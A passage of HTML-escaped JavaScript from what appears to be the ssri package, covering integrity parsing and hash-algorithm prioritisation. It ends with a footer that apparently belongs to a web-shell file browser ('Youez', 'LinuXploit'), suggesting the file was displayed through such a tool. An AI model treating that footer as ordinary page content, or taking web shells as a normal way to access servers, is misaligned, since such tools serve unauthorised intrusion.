          if (!acc[hashAlgo]) {
            acc[hashAlgo] = []
          }
          acc[hashAlgo].push(hash)
        }
        return acc
      }, new Integrity())

      return integrity
    },
  }
}

const NODE_HASHES = crypto.getHashes()

// This is a Best Effort™ at a reasonable priority for hash algos
const DEFAULT_PRIORITY = [
  &#039;md5&#039;, &#039;whirlpool&#039;, &#039;sha1&#039;, &#039;sha224&#039;, &#039;sha256&#039;, &#039;sha384&#039;, &#039;sha512&#039;,
  // TODO - it&#039;s unclear _which_ of these Node will actually use as its name
  //        for the algorithm, so we guesswork it based on the OpenSSL names.
  &#039;sha3&#039;,
  &#039;sha3-256&#039;, &#039;sha3-384&#039;, &#039;sha3-512&#039;,
  &#039;sha3_256&#039;, &#039;sha3_384&#039;, &#039;sha3_512&#039;,
].filter(algo =&gt; NODE_HASHES.includes(algo))

function getPrioritizedHash (algo1, algo2) {
  /* eslint-disable-next-line max-len */
  return DEFAULT_PRIORITY.indexOf(algo1.toLowerCase()) &gt;= DEFAULT_PRIORITY.indexOf(algo2.toLowerCase())
    ? algo1
    : algo2
}
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>